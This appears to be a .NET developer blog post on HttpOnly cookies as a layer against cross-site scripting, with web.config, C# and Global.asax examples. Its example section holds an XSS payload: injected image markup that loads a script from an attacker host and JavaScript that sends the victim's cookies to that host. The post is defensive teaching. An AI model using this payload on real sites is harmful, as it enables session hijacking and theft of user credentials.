.NET Daily

Passive Security Tip: HttpOnly Cookies

Introduction

During a Cross-site Scripting attack the attacker's script runs inside the victim's page, so it can read the page's cookies through document.cookie, send the session cookie to a host the attacker controls, and use it to hijack the victim's session.

Example

A user opens a newsletter email in a web mail client. The image markup below, injected where only an image URL was expected, breaks out of the img tag and loads a script from the attacker's host (1.2.3.4 here), which then runs in the victim's browser. The loaded script is shown after the markup:

HTML Code:

<img src="http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><img
src="http://www.a.com/a.jpg</script>"/>

Javascript Code:

// Redirects the victim to the attacker's collector, passing along the text and
// href of the second link on the page and every cookie the script can read.
window.location="http://1.2.3.4:81/r.php?u="
+document.links[1].text
+"&l="+document.links[1]
+"&c="+document.cookie;

Remedy

Cookies that carry session or authentication tokens should be marked HttpOnly. A browser does not expose an HttpOnly cookie to client-side script (document.cookie simply omits it), so even when an attacker manages to run script in the page, a payload like the one above can no longer read the session cookie and send it off-site. This is an additional layer, not a cure for Cross-site Scripting: the attacker's script still runs inside the victim's session and can issue requests that the browser sends with the cookie attached, so HttpOnly complements, rather than replaces, the output encoding that prevents the injection in the first place.

Below you can find some implementation examples:

Application-wide, in web.config: the httpCookies element sets the default for every cookie the application emits, not only the Membership or forms-authentication cookie. httpOnlyCookies="true" adds HttpOnly to all of them; requireSSL="true" additionally marks them Secure, so browsers only send them back over HTTPS, which means the site must actually be served over TLS for cookies to work at all:

<system.web>
    <!-- debug="true" is a development setting; use debug="false" in production -->
    <compilation debug="true" targetFramework="4.0" />

    <!-- HttpOnly and Secure become the defaults for every cookie the application creates -->
    <httpCookies httpOnlyCookies="true" requireSSL="true"/>
</system.web>

If you create cookies from code, set the HttpOnly property on the cookie object explicitly, so the cookie is protected even if the web.config default is missing:

    using System.Web;

    // Config.CookieName is the application's own setting, defined elsewhere.
    static HttpCookie CreateCookie(string id)
    {
        HttpCookie cookie = new HttpCookie(Config.CookieName, id);
        cookie.Path = "/";
        cookie.HttpOnly = true;   // not readable from document.cookie
        return cookie;
    }
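Both settings above rely on every code path that creates a cookie honouring them. As a safety net, added here as an example and not part of the original post, the handler below stamps HttpOnly on every cookie that is about to leave the application, including cookies added by third-party components that know nothing about your web.config, and adds Secure when the request arrived over TLS. It assumes a Global.asax in a classic ASP.NET (System.Web) application with the default response buffering, so that EndRequest still runs before the headers are sent.

```csharp
using System;
using System.Web;

// Global.asax.cs: runs for every request of the application.
public class Global : HttpApplication
{
    // EndRequest fires after the page or handler has finished but, with the
    // default response buffering, before the headers are written, so cookie
    // attributes can still be changed here.
    protected void Application_EndRequest(object sender, EventArgs e)
    {
        HttpResponse response = Context.Response;
        HttpRequest request = Context.Request;

        foreach (string name in response.Cookies.AllKeys)
        {
            HttpCookie cookie = response.Cookies[name];

            // Not readable via document.cookie from any script in the page.
            cookie.HttpOnly = true;

            // Only sent back over HTTPS. Set it only when this request itself
            // came over TLS, otherwise a plain-HTTP test deployment would never
            // get its cookies back from the browser.
            if (request.IsSecureConnection)
            {
                cookie.Secure = true;
            }
        }
    }
}
```

Request.IsSecureConnection reflects the connection to the web server itself; behind a load balancer that terminates TLS it is false, so in that setup derive the Secure decision from the forwarded-protocol header your balancer sets instead. After deploying, confirm the result by inspecting the Set-Cookie headers in the browser's developer tools: every session and authentication cookie should list HttpOnly (and Secure on an HTTPS site).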
Darius

Darius Dumitrescu is a creative Senior CMS Consultant with in depth .NET knowledge, focused on Web Development and Architecture Design.
